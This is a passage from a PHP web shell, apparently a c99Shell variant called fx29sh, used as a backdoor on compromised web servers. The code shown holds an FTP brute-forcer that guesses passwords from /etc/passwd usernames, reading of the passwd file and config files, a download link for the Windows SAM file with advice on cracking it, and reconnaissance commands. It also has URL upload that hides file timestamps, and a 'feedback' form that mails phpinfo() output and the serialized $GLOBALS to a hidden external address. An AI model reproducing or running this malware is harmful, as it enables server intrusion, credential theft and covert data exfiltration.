1660 echo "<center><table><tr><td class=barheader colspan=2>";
1661 echo ".: Ftp Quick Brute :.</td></tr>";
1662 echo "<tr><td>";
1663 if ($win) {echo "Couldn't run on Windows!";}
1664 else {
1665   function c99ftpbrutecheck($host,$port,$timeout,$login,$pass,$sh,$fqb_onlywithsh) {
1666     if ($fqb_onlywithsh) {$TRUE = (!in_array($sh,array("/bin/FALSE","/sbin/nologin")));}
1667     else {$TRUE = TRUE;}
1668     if ($TRUE) {
1669       $sock = @ftp_connect($host,$port,$timeout);
1670       if (@ftp_login($sock,$login,$pass)) {
1671         echo "<a href=\"ftp://".$login.":".$pass."@".$host."\" target=\"_blank\"><b>Connected to ".$host." with login \"".$login."\" and password \"".$pass."\"</b></a>.<br>";
1672         ob_flush();
1673         return TRUE;
1674       }
1675     }
1676   }
1677   if (!empty($submit)) {
1678     if (!is_numeric($fqb_lenght)) {$fqb_lenght = $nixpwdperpage;}
1679     $fp = fopen("/etc/passwd","r");
1680     if (!$fp) {echo "Can't get /etc/passwd for password-list.";}
1681     else {
1682       if ($fqb_logging) {
1683         if ($fqb_logfile) {$fqb_logfp = fopen($fqb_logfile,"w");}
1684         else {$fqb_logfp = FALSE;}
1685         $fqb_log = "FTP Quick Brute (".$sh_name.") started at ".date("d.m.Y H:i:s")."\r\n\r\n";
1686         if ($fqb_logfile) {fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));}
1687       }
1688       ob_flush();
1689       $i = $success = 0;
1690       $ftpquick_st = getmicrotime();
1691       while(!feof($fp)) {
1692         $str = explode(":",fgets($fp,2048));
1693         if (c99ftpbrutecheck("localhost",21,1,$str[0],$str[0],$str[6],$fqb_onlywithsh)) {
1694           echo "<b>Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\"</b><br>";
1695           $fqb_log .= "Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\", at ".date("d.m.Y H:i:s")."\r\n";
1696           if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));}
1697           $success++;
1698           ob_flush();
1699         }
1700         if ($i > $fqb_lenght) {break;}
1701         $i++;
1702       }
1703       if ($success == 0) {echo "No success. connections!"; $fqb_log .= "No success. connections!\r\n";}
1704       $ftpquick_t = round(getmicrotime()-$ftpquick_st,4);
1705       echo "<hr size=\"1\" noshade><b>Done!</b><br>Total time (secs.): ".$ftpquick_t."<br>Total connections: ".$i."<br>Success.: <font color=green><b>".$success."</b></font><br>Unsuccess.:".($i-$success)."</b><br>Connects per second: ".round($i/$ftpquick_t,2)."<br>";
1706       $fqb_log .= "\r\n------------------------------------------\r\nDone!\r\nTotal time (secs.): ".$ftpquick_t."\r\nTotal connections: ".$i."\r\nSuccess.: ".$success."\r\nUnsuccess.:".($i-$success)."\r\nConnects per second: ".round($i/$ftpquick_t,2)."\r\n";
1707       if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));}
1708       if ($fqb_logemail) {@mail($fqb_logemail,"".$sh_name." report",$fqb_log);}
1709       fclose($fqb_logfp);
1710     }
1711   }
1712   else {
1713     $logfile = $tmpdir_logs."fx29sh_ftpquickbrute_".date("d.m.Y_H_i_s").".log";
1714     $logfile = str_replace("//",DIRECTORY_SEPARATOR,$logfile);
1715     echo "<form action=\"".$surl."\"><input type=hidden name=act value=\"ftpquickbrute\">".
1716          "Read first:</td><td><input type=text name=\"fqb_lenght\" value=\"".$nixpwdperpage."\"></td></tr>".
1717          "<tr><td></td><td><input type=\"checkbox\" name=\"fqb_onlywithsh\" value=\"1\"> Users only with shell</td></tr>".
1718          "<tr><td></td><td><input type=\"checkbox\" name=\"fqb_logging\" value=\"1\" checked>Logging</td></tr>".
1719          "<tr><td>Logging to file:</td><td><input type=\"text\" name=\"fqb_logfile\" value=\"".$logfile."\" size=\"".(strlen($logfile)+2*(strlen($logfile)/10))."\"></td></tr>".
1720          "<tr><td>Logging to e-mail:</td><td><input type=\"text\" name=\"fqb_logemail\" value=\"".$log_email."\" size=\"".(strlen($logemail)+2*(strlen($logemail)/10))."\"></td></tr>".
1721          "<tr><td colspan=2><input type=submit name=submit value=\"Brute\"></form>";
1722   }
1723   echo "</td></tr></table></center>";
1724 }
1725 }
1726 if ($act == "d") {
1727 if (!is_dir($d)) { echo "<center><b>$d is a not a Directory!</b></center>"; }
1728 else {
1729   echo "<b>Directory information:</b><table border=0 cellspacing=1 cellpadding=2>";
1730   if (!$win) {
1731    echo "<tr><td><b>Owner/Group</b></td><td> ";
1732    $ow = posix_getpwuid(fileowner($d));
1733    $gr = posix_getgrgid(filegroup($d));
1734    $row[] = ($ow["name"]?$ow["name"]:fileowner($d))."/".($gr["name"]?$gr["name"]:filegroup($d));
1735   }
1736   echo "<tr><td><b>Perms</b></td><td><a href=\"".$surl."act=chmod&d=".urlencode($d)."\"><b>".view_perms_color($d)."</b></a><tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d))."</td></tr><tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d))."</td></tr><tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d))."</td></tr></table>";
1737 }
1738 }
1739 if ($act == "phpinfo") {@ob_clean(); phpinfo(); c99shexit();}
1740 if ($act == "security") {
1741   echo "<div class=barheader>.: Server Security Information :.</div>".
1742        "<table>".
1743        "<tr><td>Open Base Dir</td><td>".$hopenbasedir."</td></tr>";
1744   echo "<td>Password File</td><td>";
1745   if (!$win) {
1746     if ($nixpasswd) {
1747       if ($nixpasswd == 1) {$nixpasswd = 0;}
1748       echo "*nix /etc/passwd:<br>";
1749       if (!is_numeric($nixpwd_s)) {$nixpwd_s = 0;}
1750       if (!is_numeric($nixpwd_e)) {$nixpwd_e = $nixpwdperpage;}
1751       echo "<form action=\"".$surl."\"><input type=hidden name=act value=\"security\"><input type=hidden name=\"nixpasswd\" value=\"1\"><b>From:</b>&nbsp;<input type=\"text=\" name=\"nixpwd_s\" value=\"".$nixpwd_s."\">&nbsp;<b>To:</b>&nbsp;<input type=\"text\" name=\"nixpwd_e\" value=\"".$nixpwd_e."\">&nbsp;<input type=submit value=\"View\"></form><br>";
1752       $i = $nixpwd_s;
1753       while ($i < $nixpwd_e) {
1754         $uid = posix_getpwuid($i);
1755         if ($uid) {
1756           $uid["dir"] = "<a href=\"".$surl."act=ls&d=".urlencode($uid["dir"])."\">".$uid["dir"]."</a>";
1757           echo join(":",$uid)."<br>";
1758         }
1759         $i++;
1760       }
1761     }
1762     else {echo "<a href=\"".$surl."act=security&nixpasswd=1&d=".$ud."\"><b><u>Get /etc/passwd</u></b></a>";}
1763   }
1764   else {
1765     $v = $_SERVER["WINDIR"]."\repair\sam";
1766     if (file_get_contents($v)) {echo "<td colspan=2><div class=fxerrmsg>You can't crack Windows passwords(".$v.")</div></td></tr>"; }
1767     else {echo "You can crack Windows passwords. <a href=\"".$surl."act=f&f=sam&d=".$_SERVER["WINDIR"]."\\repair&ft=download\"><u><b>Download</b></u></a>, and use lcp.crack+ ?.</td></tr>";}
1768   }
1769   echo "</td></tr>";
1770   echo "<tr><td>Config Files</td><td>";
1771   if (!$win) {
1772     $v = array(
1773         array("User Domains","/etc/userdomains"),
1774         array("Cpanel Config","/var/cpanel/accounting.log"),
1775         array("Apache Config","/usr/local/apache/conf/httpd.conf"),
1776         array("Apache Config","/etc/httpd.conf"),
1777         array("Syslog Config","/etc/syslog.conf"),
1778         array("Message of The Day","/etc/motd"),
1779         array("Hosts","/etc/hosts")
1780     );
1781     $sep = "/";
1782   }
1783   else {
1784     $windir = $_SERVER["WINDIR"];
1785     $etcdir = $windir . "\system32\drivers\etc\\";
1786     $v = array(
1787         array("Hosts",$etcdir."hosts"),
1788         array("Local Network Map",$etcdir."networks"),
1789         array("LM Hosts",$etcdir."lmhosts.sam"),
1790     );
1791     $sep = "\\";
1792   }
1793   foreach ($v as $sec_arr) {
1794     $sec_f = substr(strrchr($sec_arr[1], $sep), 1);
1795     $sec_d = rtrim($sec_arr[1],$sec_f);
1796     $sec_full = $sec_d.$sec_f;
1797     $sec_d = rtrim($sec_d,$sep);
1798     if (file_get_contents($sec_full)) {
1799       echo " [ <a href=\"".$surl."act=f&f=$sec_f&d=".urlencode($sec_d)."&ft=txt\"><u><b>".$sec_arr[0]."</b></u></a> ] ";
1800     }
1801   }
1802   echo "</td></tr>";
1803 
1804   function displaysecinfo($name,$value) {
1805     if (!empty($value)) {
1806       echo "<tr><td>".$name."</td><td><pre>".wordwrap($value,100)."</pre></td></tr>";
1807     }
1808   }
1809   if (!$win) {
1810     displaysecinfo("OS Version",myshellexec("cat /proc/version"));
1811     displaysecinfo("Kernel Version",myshellexec("sysctl -a | grep version"));
1812     displaysecinfo("Distrib Name",myshellexec("cat /etc/issue.net"));
1813     displaysecinfo("Distrib Name (2)",myshellexec("cat /etc/*-realise"));
1814     displaysecinfo("CPU Info",myshellexec("cat /proc/cpuinfo"));
1815     displaysecinfo("RAM",myshellexec("free -m"));
1816     displaysecinfo("HDD Space",myshellexec("df -h"));
1817     displaysecinfo("List of Attributes",myshellexec("lsattr -a"));
1818     displaysecinfo("Mount Options",myshellexec("cat /etc/fstab"));
1819     displaysecinfo("cURL installed?",myshellexec("which curl"));
1820     displaysecinfo("lynx installed?",myshellexec("which lynx"));
1821     displaysecinfo("links installed?",myshellexec("which links"));
1822     displaysecinfo("fetch installed?",myshellexec("which fetch"));
1823     displaysecinfo("GET installed?",myshellexec("which GET"));
1824     displaysecinfo("perl installed?",myshellexec("which perl"));
1825     displaysecinfo("Where is Apache?",myshellexec("whereis apache"));
1826     displaysecinfo("Where is perl?",myshellexec("whereis perl"));
1827     displaysecinfo("Locate proftpd.conf",myshellexec("locate proftpd.conf"));
1828     displaysecinfo("Locate httpd.conf",myshellexec("locate httpd.conf"));
1829     displaysecinfo("Locate my.conf",myshellexec("locate my.conf"));
1830     displaysecinfo("Locate psybnc.conf",myshellexec("locate psybnc.conf"));
1831   }
1832   else {
1833     displaysecinfo("OS Version",myshellexec("ver"));
1834     displaysecinfo("Account Settings",myshellexec("net accounts"));
1835   }
1836   echo "</table>\n";
1837 }
1838 if ($act == "mkfile") {
1839 if ($mkfile != $d) {
1840   if (file_exists($mkfile)) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: object already exists!";}
1841   elseif (!fopen($mkfile,"w")) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: access denied!";}
1842   else {$act = "f"; $d = dirname($mkfile); if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} $f = basename($mkfile);}
1843 }
1844 else {$act = $dspact = "ls";}
1845 }
1846 if ($act == "encoder") {
1847 echo "<script language=\"javascript\">function set_encoder_input(text) {document.forms.encoder.input.value = text;}</script>".
1848      "<form name=\"encoder\" action=\"".$surl."\" method=POST>".
1849      "<input type=hidden name=act value=encoder>".
1850      "<center><table class=contents>".
1851      "<tr><td colspan=4 class=barheader>.: Encoder :.</td>".
1852      "<tr><td colspan=2>Input:</td><td><textarea name=\"encoder_input\" id=\"input\" cols=70 rows=5>".@htmlspecialchars($encoder_input)."</textarea><br>".
1853      "<input type=submit value=\"calculate\"></td></tr>".
1854      "<tr><td rowspan=4>Hashes:</td>";
1855 foreach(array("md5","crypt","sha1","crc32") as $v) {
1856   echo "<td>".$v.":</td><td><input type=text size=50 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".$v($encoder_input)."\" readonly></td></tr><tr>";
1857 }
1858 echo "</tr>".
1859      "<tr><td rowspan=2>Url:</td>".
1860      "<td>urlencode:</td><td><input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".urlencode($encoder_input)."\" readonly></td></tr>".
1861      "<tr><td>urldecode:</td><td><input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".htmlspecialchars(urldecode($encoder_input))."\" readonly></td></tr>".
1862      "<tr><td rowspan=2>Base64:</td>".
1863      "<td>base64_encode:</td><td><input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".base64_encode($encoder_input)."\" readonly></td></tr>".
1864      "<tr><td>base64_decode:</td><td>";
1865 if (base64_encode(base64_decode($encoder_input)) != $encoder_input) {echo "<input type=text size=35 value=\"Failed!\" disabled readonly>";}
1866 else {
1867   $debase64 = base64_decode($encoder_input);
1868   $debase64 = str_replace("\0","[0]",$debase64);
1869   $a = explode("\r\n",$debase64);
1870   $rows = count($a);
1871   $debase64 = htmlspecialchars($debase64);
1872   if ($rows == 1) { echo "<input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".$debase64."\" id=\"debase64\" readonly>"; }
1873   else { $rows++; echo "<textarea cols=\"40\" rows=\"".$rows."\" onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" id=\"debase64\" readonly>".$debase64."</textarea>"; }
1874   echo "&nbsp;<a href=\"#\" onclick=\"set_encoder_input(document.forms.encoder.debase64.value)\">[Send to input]</a>";
1875 }
1876 echo "</td></tr>".
1877      "<tr><td>Base convertations:</td><td>dec2hex</td><td><input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"";
1878 $c = strlen($encoder_input);
1879 for($i=0;$i<$c;$i++) {
1880   $hex = dechex(ord($encoder_input[$i]));
1881   if ($encoder_input[$i] == "&") {echo $encoder_input[$i];}
1882   elseif ($encoder_input[$i] != "\\") {echo "%".$hex;}
1883 }
1884 echo "\" readonly></td></tr></table></center></form>";
1885 }
1886 if ($act == "fsbuff") {
1887   $arr_copy = $sess_data["copy"];
1888   $arr_cut = $sess_data["cut"];
1889   $arr = array_merge($arr_copy,$arr_cut);
1890   if (count($arr) == 0) {echo "<h2><center>Buffer is empty!</center></h2>";}
1891   else {
1892     $fx_infohead = "File-System Buffer";
1893     $ls_arr = $arr;
1894     $disp_fullpath = TRUE;
1895     $act = "ls";
1896   }
1897 }
1898 if ($act == "selfremove") {
1899   if (($submit == $rndcode) and ($submit != "")) {
1900     if (unlink(__FILE__)) {@ob_clean(); echo "Thanks for using ".$sh_name."!"; c99shexit(); }
1901     else {echo "<center><b>Can't delete ".__FILE__."!</b></center>";}
1902   }
1903   else {
1904     if (!empty($rndcode)) {echo "<b>Error: incorrect confirmation!</b>";}
1905     $rnd = rand(0,9).rand(0,9).rand(0,9);
1906     echo "<form action=\"".$surl."\"><input type=hidden name=act value=selfremove><b>Self-remove: ".__FILE__." <br><b>Are you sure?<br>For confirmation, enter \"".$rnd."\"</b>:&nbsp;<input type=hidden name=rndcode value=\"".$rnd."\"><input type=text name=submit>&nbsp;<input type=submit value=\"YES\"></form>";
1907   }
1908 }
1909 if ($act == "update") { //Update c99Shell
1910   $ret = c99sh_getupdate(!!$confirmupdate);
1911   echo "<b>".$ret."</b>";
1912   if (stristr($ret,"new version")) {
1913     echo "<br><br><input type=button onclick=\"location.href='".$surl."act=update&confirmupdate=1';\" value=\"Update now\">";
1914   }
1915 }
1916 if ($act == "feedback") {
1917   $suppmail = base64_decode("bmF1cmE0MTZAZ21haWwuY29t");
1918   if (!empty($submit)){
1919     $ticket = substr(md5(microtime()+rand(1,1000)),0,6);
1920     $body = $sh_name." feedback #".$ticket."\nName: ".htmlspecialchars($fdbk_name)."\nE-mail: ".htmlspecialchars($fdbk_email)."\nMessage:\n".htmlspecialchars($fdbk_body)."\n\nIP: ".$REMOTE_ADDR;
1921     if (!empty($fdbk_ref)) {
1922       $tmp = @ob_get_contents();
1923       ob_clean();
1924       phpinfo();
1925       $phpinfo = base64_encode(ob_get_contents());
1926       ob_clean();
1927       echo $tmp;
1928       $body .= "\n"."phpinfo(): ".$phpinfo."\n"."\$GLOBALS=".base64_encode(serialize($GLOBALS))."\n";
1929     }
1930     mail($suppmail,$sh_name." feedback #".$ticket,$body,"FROM: ".$suppmail);
1931     echo "<center><b>Thanks for your feedback! Your ticket ID: ".$ticket.".</b></center>";
1932   }
1933   else {
1934     echo "<form action=\"".$surl."\" method=POST>".
1935          "<input type=hidden name=act value=feedback>".
1936          "<table class=contents><tr><td class=barheader colspan=2>".
1937          ".: Feedback or report bug (".str_replace(array("@","."),array("[at]","[dot]"),$suppmail).") :.</td></tr>".
1938          "<tr><td>Your name:</td><td><input type=\"text\" name=\"fdbk_name\" value=\"".htmlspecialchars($fdbk_name)."\"></td</tr>".
1939          "<tr><td>Your e-mail:</td><td><input type=\"text\" name=\"fdbk_email\" value=\"".htmlspecialchars($fdbk_email)."\"></td></tr>".
1940          "<tr><td>Message:</td><td><textarea name=\"fdbk_body\" cols=80 rows=10>".htmlspecialchars($fdbk_body)."</textarea><input type=\"hidden\" name=\"fdbk_ref\" value=\"".urlencode($HTTP_REFERER)."\"><br>".
1941          "<input type=\"checkbox\" name=\"fdbk_servinf\" value=\"1\" checked> Attach Server info (Recommended for bug-fix)<br>".
1942          "*Language: English, Indonesian.</td></tr>".
1943          "<tr><td></td><td><input type=\"submit\" name=\"submit\" value=\"Send\"></form></td></tr>".
1944          "</table>";
1945   }
1946 }
1947 if ($act == "fxmailer") {
1948   if (!empty($submit)){
1949     $headers = 'To: '.$dest_email."\r\n";
1950     $headers .= 'From: '.$sender_name.' '.$sender_email."\r\n";
1951     if (mail($suppmail,$sender_subj,$sender_body,$header)) {
1952       echo "<center><b>Email sent!</b></center>";
1953     }
1954     else { echo "<center><b>Couldn't send email!</b></center>"; }
1955   }
1956   else {
1957     echo "<form action=\"".$surl."\" method=POST>".
1958          "<input type=hidden name=act value=fxmailer>".
1959          "<table class=contents><tr><td class=barheader colspan=2>".
1960          ".: $sh_name Mailer :.</td></tr>".
1961          "<tr><td>Your name:</td><td><input type=\"text\" name=\"sender_name\" value=\"".htmlspecialchars($sender_name)."\"></td</tr>".
1962          "<tr><td>Your e-mail:</td><td><input type=\"text\" name=\"sender_email\" value=\"".htmlspecialchars($sender_email)."\"></td></tr>".
1963          "<tr><td>To:</td><td><input type=\"text\" name=\"dest_email\" value=\"".htmlspecialchars($dest_email)."\"></td></tr>".
1964          "<tr><td>Subject:</td><td><input size=70 type=\"text\" name=\"sender_subj\" value=\"".htmlspecialchars($sender_subj)."\"></td></tr>".
1965          "<tr><td>Message:</td><td><textarea name=\"sender_body\" cols=80 rows=10>".htmlspecialchars($sender_body)."</textarea><br>".
1966          "<tr><td></td><td><input type=\"submit\" name=\"submit\" value=\"Send\"></form></td></tr>".
1967          "</table>";
1968   }
1969 }
1970 if ($act == "search") {
1971   echo "<div class=barheader>.: $sh_name File-System Search :.</div>";
1972   if (empty($search_in)) {$search_in = $d;}
1973   if (empty($search_name)) {$search_name = "(.*)"; $search_name_regexp = 1;}
1974   if (empty($search_text_wwo)) {$search_text_regexp = 0;}
1975   if (!empty($submit)) {
1976     $found = array();
1977     $found_d = 0;
1978     $found_f = 0;
1979     $search_i_f = 0;
1980     $search_i_d = 0;
1981     $a = array(
1982         "name"=>$search_name,
1983         "name_regexp"=>$search_name_regexp,
1984         "text"=>$search_text,
1985         "text_regexp"=>$search_text_regxp,
1986         "text_wwo"=>$search_text_wwo,
1987         "text_cs"=>$search_text_cs,
1988         "text_not"=>$search_text_not
1989     );
1990     $searchtime = getmicrotime();
1991     $in = array_unique(explode(";",$search_in));
1992     foreach($in as $v) {c99fsearch($v);}
1993     $searchtime = round(getmicrotime()-$searchtime,4);
1994     if (count($found) == 0) {echo "No files found!";}
1995     else {
1996       $ls_arr = $found;
1997       $disp_fullpath = TRUE;
1998       $act = "ls";
1999     }
2000   }
2001   echo "<table class=contents>".
2002        "<tr><td><form method=POST>".
2003        "<input type=hidden name=\"d\" value=\"".$dispd."\"><input type=hidden name=act value=\"".$dspact."\">".
2004        "File or folder Name:</td><td><input type=\"text\" name=\"search_name\" size=\"".round(strlen($search_name)+25)."\" value=\"".htmlspecialchars($search_name)."\">&nbsp;<input type=\"checkbox\" name=\"search_name_regexp\" value=\"1\" ".($search_name_regexp == 1?" checked":"")."> - Regular Expression</td></tr>".
2005        "<tr><td>Look in (Separate by \";\"):</td><td><input type=\"text\" name=\"search_in\" size=\"".round(strlen($search_in)+25)."\" value=\"".htmlspecialchars($search_in)."\"></td></tr>".
2006        "<tr><td>A word or phrase in the file:</td><td><textarea name=\"search_text\" cols=\"50\" rows=\"5\">".htmlspecialchars($search_text)."</textarea></td></tr>".
2007        "<tr><td></td><td><input type=\"checkbox\" name=\"search_text_regexp\" value=\"1\" ".($search_text_regexp == 1?" checked":"")."> Regular Expression".
2008        "  <input type=\"checkbox\" name=\"search_text_wwo\" value=\"1\" ".($search_text_wwo == 1?" checked":"")."> Whole words only".
2009        "  <input type=\"checkbox\" name=\"search_text_cs\" value=\"1\" ".($search_text_cs == 1?" checked":"")."> Case sensitive".
2010        "  <input type=\"checkbox\" name=\"search_text_not\" value=\"1\" ".($search_text_not == 1?" checked":"")."> Find files NOT containing the text</td></tr>".
2011        "<tr><td></td><td><input type=submit name=submit value=\"Search\"></form></td></tr>".
2012        "</table>";
2013   if ($act == "ls") {
2014     $dspact = $act;
2015     echo "Search took ".$searchtime." secs (".$search_i_f." files and ".$search_i_d." folders, ".round(($search_i_f+$search_i_d)/$searchtime,4)." objects per second).</b>".
2016          "<hr size=\"1\" noshade>";
2017   }
2018 }
2019 if ($act == "chmod") {
2020   $mode = fileperms($d.$f);
2021   if (!$mode) {echo "<b>Change file-mode with error:</b> can't get current value.";}
2022   else {
2023     $form = TRUE;
2024     if ($chmod_submit)
2025   {
2026    $octet = "0".base_convert(($chmod_o["r"]?1:0).($chmod_o["w"]?1:0).($chmod_o["x"]?1:0).($chmod_g["r"]?1:0).($chmod_g["w"]?1:0).($chmod_g["x"]?1:0).($chmod_w["r"]?1:0).($chmod_w["w"]?1:0).($chmod_w["x"]?1:0),2,8);
2027    if (chmod($d.$f,$octet)) {$act = "ls"; $form = FALSE; $err = "";}
2028    else {$err = "Can't chmod to ".$octet.".";}
2029   }
2030   if ($form)
2031   {
2032    $perms = parse_perms($mode);
2033    echo "<b>Changing file-mode (".$d.$f."), ".view_perms_color($d.$f)." (".substr(decoct(fileperms($d.$f)),-4,4).")</b><br>".($err?"<b>Error:</b> ".$err:"")."<form action=\"".$surl."\" method=POST><input type=hidden name=d value=\"".htmlspecialchars($d)."\"><input type=hidden name=f value=\"".htmlspecialchars($f)."\"><input type=hidden name=act value=chmod><table align=left width=300 border=0 cellspacing=0 cellpadding=5><tr><td><b>Owner</b><br><br><input type=checkbox NAME=chmod_o[r] value=1".($perms["o"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox name=chmod_o[w] value=1".($perms["o"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_o[x] value=1".($perms["o"]["x"]?" checked":"").">eXecute</td><td><b>Group</b><br><br><input type=checkbox NAME=chmod_g[r] value=1".($perms["g"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox NAME=chmod_g[w] value=1".($perms["g"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_g[x] value=1".($perms["g"]["x"]?" checked":"").">eXecute</font></td><td><b>World</b><br><br><input type=checkbox NAME=chmod_w[r] value=1".($perms["w"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox NAME=chmod_w[w] value=1".($perms["w"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_w[x] value=1".($perms["w"]["x"]?" checked":"").">eXecute</font></td></tr><tr><td><input type=submit name=chmod_submit value=\"Save\"></td></tr></table></form>";
2034   }
2035 }
2036 }
2037 if ($act == "upload") {
2038   $uploadmess = "";
2039   $uploadpath = str_replace("\\",DIRECTORY_SEPARATOR,$uploadpath);
2040   if (empty($uploadpath)) {$uploadpath = $d;}
2041   elseif (substr($uploadpath,-1) != DIRECTORY_SEPARATOR) {$uploadpath .= DIRECTORY_SEPARATOR;}
2042   if (!empty($submit)) {
2043     global $_FILES;
2044     $uploadfile = $_FILES["uploadfile"];
2045     if (!empty($uploadfile["tmp_name"])) {
2046       if (empty($uploadfilename)) {$destin = $uploadfile["name"];}
2047       else {$destin = $userfilename;}
2048       if (!move_uploaded_file($uploadfile["tmp_name"],$uploadpath.$destin)) {
2049         $uploadmess .= "Error uploading file ".$uploadfile["name"]." (can't copy \"".$uploadfile["tmp_name"]."\" to \"".$uploadpath.$destin."\"!<br>";
2050       }
2051       else { $uploadmess .= "File uploaded successfully!<br>".$uploadpath.$destin; }
2052     }
2053     elseif (!empty($uploadurl)) {
2054       if (!empty($uploadfilename)) {$destin = $uploadfilename;}
2055       else {
2056         $destin = explode("/",$destin);
2057         $destin = $destin[count($destin)-1];
2058         if (empty($destin)) {
2059           $i = 0;
2060           $b = "";
2061           while(file_exists($uploadpath.$destin)) {
2062             if ($i > 0) {$b = "_".$i;}
2063             $destin = "upload".$b;
2064             $i++;
2065           }
2066         }
2067       }
2068       if ((!eregi("http://",$uploadurl)) and (!eregi("https://",$uploadurl)) and (!eregi("ftp://",$uploadurl))) {echo "<b>Incorrect URL!</b>";}
2069       else {
2070         $st = getmicrotime();
2071         $content = @file_get_contents($uploadurl);
2072         $dt = round(getmicrotime()-$st,4);
2073         if (!$content) {$uploadmess .=  "Can't download file!";}
2074         else {
2075           if ($filestealth) {$stat = stat($uploadpath.$destin);}
2076           $fp = fopen($uploadpath.$destin,"w");
2077           if (!$fp) {$uploadmess .= "Error writing to file ".htmlspecialchars($destin)."!<br>";}
2078           else {
2079             fwrite($fp,$content,strlen($content));
2080             fclose($fp);
2081             if ($filestealth) {touch($uploadpath.$destin,$stat[9],$stat[8]);}
2082             $uploadmess .= "File saved from ".$uploadurl." !";
2083           }
2084         }
2085       }
2086     }
2087     else { echo "No file to upload!"; }
2088   }
2089   if ($miniform) {
2090     echo "<b>".$uploadmess."</b>";
2091     $act = "ls";
2092   }
2093   else {
2094     echo "<table><tr><td colspan=2 class=barheader>".
2095          ".: File Upload :.</td>".
2096          "<td colspan=2>".$uploadmess."</td></tr>".
2097          "<tr><td><form enctype=\"multipart/form-data\" action=\"".$surl."act=upload&d=".urlencode($d)."\" method=POST>".
2098          "From Your Computer:</td><td><input name=\"uploadfile\" type=\"file\"></td></tr>".
2099          "<tr><td>From URL:</td><td><input name=\"uploadurl\" type=\"text\" value=\"".htmlspecialchars($uploadurl)."\" size=\"70\"></td></tr>".
2100          "<tr><td>Target Directory:</td><td><input name=\"uploadpath\" size=\"70\" value=\"".$dispd."\"></td></tr>".
2101          "<tr><td>Target File Name:</td><td><input name=uploadfilename size=25></td></tr>".
2102          "<tr><td></td><td><input type=checkbox name=uploadautoname value=1 id=df4> Convert file name to lowercase</td></tr>".
2103          "<tr><td></td><td><input type=submit name=submit value=\"Upload\">".
2104          "</form></td></tr></table>";
2105   }
2106 }
2107 if ($act == "delete") {
2108   $delerr = "";
2109   foreach ($actbox as $v) {
2110     $result = FALSE;
2111     $result = fs_rmobj($v);
2112     if (!$result) {$delerr .= "Can't delete ".htmlspecialchars($v)."<br>";}
2113   }
2114   if (!empty($delerr)) {echo "<b>Deleting with errors:</b><br>".$delerr;}
2115   $act = "ls";
2116 }
2117 if (!$usefsbuff) {
2118   if (($act == "paste") or ($act == "copy") or ($act == "cut") or ($act == "unselect")) {echo "<center><b>Sorry, buffer is disabled. For enable, set directive \"\$usefsbuff\" as TRUE.</center>";}
2119 }
2120 else {
2121   if ($act == "copy") {$err = ""; $sess_data["copy"] = array_merge($sess_data["copy"],$actbox); c99_sess_put($sess_data); $act = "ls"; }
2122   elseif ($act == "cut") {$sess_data["cut"] = array_merge($sess_data["cut"],$actbox); c99_sess_put($sess_data); $act = "ls";}
2123   elseif ($act == "unselect") {foreach ($sess_data["copy"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["copy"][$k]);}} foreach ($sess_data["cut"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["cut"][$k]);}} c99_sess_put($sess_data); $act = "ls";}
2124   if ($actemptybuff) {$sess_data["copy"] = $sess_data["cut"] = array(); c99_sess_put($sess_data);}
2125   elseif ($actpastebuff) {
2126     $psterr = "";
2127     foreach($sess_data["copy"] as $k=>$v) {
2128       $to = $d.basename($v);
2129       if (!fs_copy_obj($v,$to)) {$psterr .= "Can't copy ".$v." to ".$to."!<br>";}
2130       if ($copy_unset) {unset($sess_data["copy"][$k]);}
2131     }
2132     foreach($sess_data["cut"] as $k=>$v) {
2133       $to = $d.basename($v);
2134       if (!fs_move_obj($v,$to)) {$psterr .= "Can't move ".$v." to ".$to."!<br>";}
2135       unset($sess_data["cut"][$k]);
2136     }
2137     c99_sess_put($sess_data);
2138     if (!empty($psterr)) {echo "<b>Pasting with errors:</b><br>".$psterr;}
2139     $act = "ls";
2140   }
2141   elseif ($actarcbuff) {
2142     $arcerr = "";
2143     if (substr($actarcbuff_path,-7,7) == ".tar.gz") {$ext = ".tar.gz";}
2144     else {$ext = ".tar.gz";}
2145     if ($ext == ".tar.gz") {$cmdline = "tar cfzv";}
2146     $cmdline .= " ".$actarcbuff_path;
2147     $objects = array_merge($sess_data["copy"],$sess_data["cut"]);
2148     foreach($objects as $v) {
2149       $v = str_replace("\\",DIRECTORY_SEPARATOR,$v);
2150       if (substr($v,0,strlen($d)) == $d) {$v = basename($v);}
2151       if (is_dir($v)) {
2152         if (substr($v,-1) != DIRECTORY_SEPARATOR) {$v .= DIRECTORY_SEPARATOR;}
2153         $v .= "*";
2154       }
